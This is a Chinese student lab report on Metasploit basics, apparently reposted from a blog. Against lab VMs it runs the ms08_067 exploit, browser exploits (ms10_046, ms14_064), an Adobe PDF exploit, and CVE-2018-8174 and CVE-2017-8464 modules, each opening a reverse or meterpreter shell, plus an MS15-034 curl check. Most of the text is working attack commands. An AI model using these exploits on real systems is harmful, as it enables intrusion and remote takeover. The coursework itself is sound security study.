目录
1.1一个主动攻击实践,如ms08_067; (1分)
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
1.3 一个针对客户端的攻击,如Adobe;(1分)
1.4 成功应用任何一个辅助模块。(0.5分)
(1)用自己的话解释什么是exploit,payload,encode.
1.先用search ms08_067指令查询一下针对该漏洞可以运用的攻击模块:
2.用use exploit/windows/smb/ms08_067_netapi
使用该模块,再使用show payloads查看可以供我们使用的payload
3.我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp
对payload进行设置:
4.接着使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址):
5.show targets 查看这个漏洞波及的系统版本共71个,主要是xp和2003。我们也可以通过修改target的值,来选择我们具体想要攻击的计算机系统(通常可以采用自动选取,即target设置为0)
6.接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用dir指令查看目录文件:
一开始用的老师给的xp中文版虚拟机,结果一直提示没有建立会话:
从学姐那拷了英文版的xp,后面就没有出现类似问题。
search ms11_050 搜索漏洞
use windows/browser/ms10_046_shortcut_icon_dllloader 使用漏洞
show payloads 显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp 选择攻击载荷
options 查看配置信息
set LHOST [ip] 设置监听地址
set 设置监听端口
set 设置攻击Ip
exploit 开始攻击,并在靶机打开msf给的http网址
sessions -i num 查看开启的会话
search ms14_064 搜索漏洞
use windows/browser/ms14_064_ole_code_execution 使用漏洞
show payloads 显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp 选择攻击载荷
options 查看配置信息
set LHOST 192.168.19.129 设置监听地址
set LPORT 5230 设置监听端口
set URIPATH tky 设置url域名
exploit 开始攻击,并在靶机打开IE浏览器输入生成的网址,kali的8080端口监听获得连接,建立会话
sessions -i num 查看开启的会话
1.根据自己的需求选择攻击模块,将其载入。选用exploit/windows/fileformat/adobe_toolbutton
2.使用命令show payloads
选择要使用的payload(这里使用了windows/meterpreter/reverse_http
)
3.使用命令show options
查看相关参数设置要求
4.设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/
目录下成功生成了一个5230.pdf文件:
5.然后将该文件传送到靶机上(通过共享文件夹)并且在攻击机上打开监听
6.将靶机中的pdf文件打开,攻击机成功获取到靶机shell:
最开始下载了adobe9.3,但是攻击不成功,总是会闪退
重新下载了adobe的版本——9.0即可
1.首先到GitHub上下载用于该漏洞的攻击模块https://github.com/0x09AL/CVE-2018-8174-msf.git
2.下载到kali之中并查看一下目录是否成功下载,将CVE-2018-8174.rb复制到 fileformat 目录/:
cd CVE-2018-8174-msf/
cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/ /*将CVE-2018-8174.rtf复制到 exploits 目录*/
cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/
use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.19.129
set lhost 192.168.19.129
exploit
最开始用CP命令拷贝文件到相应的文件夹下后,执行msfconsole会报错
看了一下报错的内容,最后一句意思大概意思是要使用小写,修改以后可正常执行
此处一定要将.rb文件名中的CVE变为小写,.crt不变
靶机:7
在开始之前先通过命令search CVE:2018 type:exploit
找了一下CVE-2017和2018漏洞有哪些,其实很多英文参数看不懂,这时候百度就是个好东西,有很多漏洞要不就是涉及的知识我不懂,要不就是它需要的环境和软件我下载不下来,挑来选去选中了这个漏洞
打开终端
msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.19.129
exploit
use multi/handler
set paylaod windows/meterpreter/reverse_tcp
set LHOST192.168.19.129
exploit
在正式攻击之前可以先用auxiliary中的扫描端口模块扫描受害机开发的端口
首先需要安装IIS服务
win12安装好iis服务后访问80端口,检测是否存在漏洞:使用curl发送以下数据curl http://192.168.19.148 -H "Host: 192.168.19.148" -H "Range: bytes=0-18446744073709551615"
当出现Requested Range Not Satisfiable时说明存在漏洞。
在msf中执行过程如下,原理与之前的一样
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
show options
set rhosts 192.168.19.148
set threads 10
exploit
2018-2019-2 网络对抗技术 20165230 Exp5 MSF基础应用
原文:https://www.cnblogs.com/tiankunye/p/10698599.html